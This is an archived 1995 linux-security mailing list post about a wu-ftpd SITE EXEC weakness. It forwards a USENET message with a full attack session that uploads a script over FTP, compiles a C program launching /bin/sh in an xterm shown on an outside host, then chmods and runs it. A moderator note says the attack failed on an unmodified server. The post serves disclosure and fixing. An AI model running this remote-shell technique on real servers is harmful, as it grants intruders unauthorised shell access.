[250] in linux-security and linux-alert archive
Wu-ftpd.
daemon@ATHENA.MIT.EDU (thomas)
Mon May 29 19:00:49 1995
Date: Mon, 29 May 1995 21:13:32 +0200 (GMT+0200)
From: thomas <safety@castle.hiof.no>
To: linux-security@tarsier.cv.nrao.edu
[mod: When I tried this out, it didn't work for me. Looking at the
source, I found that an unmodified wu-fptd-2.4. prepends
/bin/ftp-exec to every command received in a SITE EXEC request.
Unless I have overlooked something big, and unless binaries from
some Linux distributions have been `improved' by adding a
different _PATH_EXECPATH #define, I can't see how this should
work. If it does on your system, please get in contact with us.
--okir]
This was grabbed from USENET comp.security.unix
We tested it out, in /etc/ftpaccess you can deny chmod but since local
users can use a shell to chmod and then run the shell from FTP.
I am looking at a fix, but I haven't finished it yet.
And, should the fix be as a define in /etc/ftpaccess or just remove
exec's alltogether?
Guess someone with more understandings of the WU-ftpd can make a neater fix.
If it's nessesary...
--- Forwarded message follows ---
From: an113354@anon.penet.fi (Michel)
Date: Sat, 27 May 1995 02:43:42 UTC
Subject: Re: is /usr/bin/passwd as a shell a security-hazard?
> xhost +open-linux.somewhere.edu
open-linux.somewhere.edu being added to access control list
>
> cat >fun.sh
#!/bin/sh
cat >fun.c <<EOF
main()
{
seteuid(getuid());
execlp("/usr/X11R6/bin/xterm","xterm",
"-display","roguehost.rg.edu:0","-e","/bin/sh",0);
}
EOF
/usr/bin/gcc fun.c
exec a.out
>
> ftp open-linux.somewhere.edu
Connected to open-linux.somewhere.edu.
220 open-linux.somewhere.edu FTP server (Version wu-2.4(1) Wed May 10
21:00:32
CDT 1995) ready.
Name (open-linux.somewhere.edu:cracker): cracker
331 Password required for cracker.
Password:
230 User cracker logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put fun.sh
200 PORT command successful.
150 Opening BINARY mode data connection for fun.sh.
226 Transfer complete.
169 bytes sent in 0.00109 secs (1.5e+02 Kbytes/sec)
ftp> quote "site chmod 755 fun.sh"
200 CHMOD command successful.
ftp> quote "site exec sh fun.sh"
200-sh fun.sh
200 (end of 'sh fun.sh')
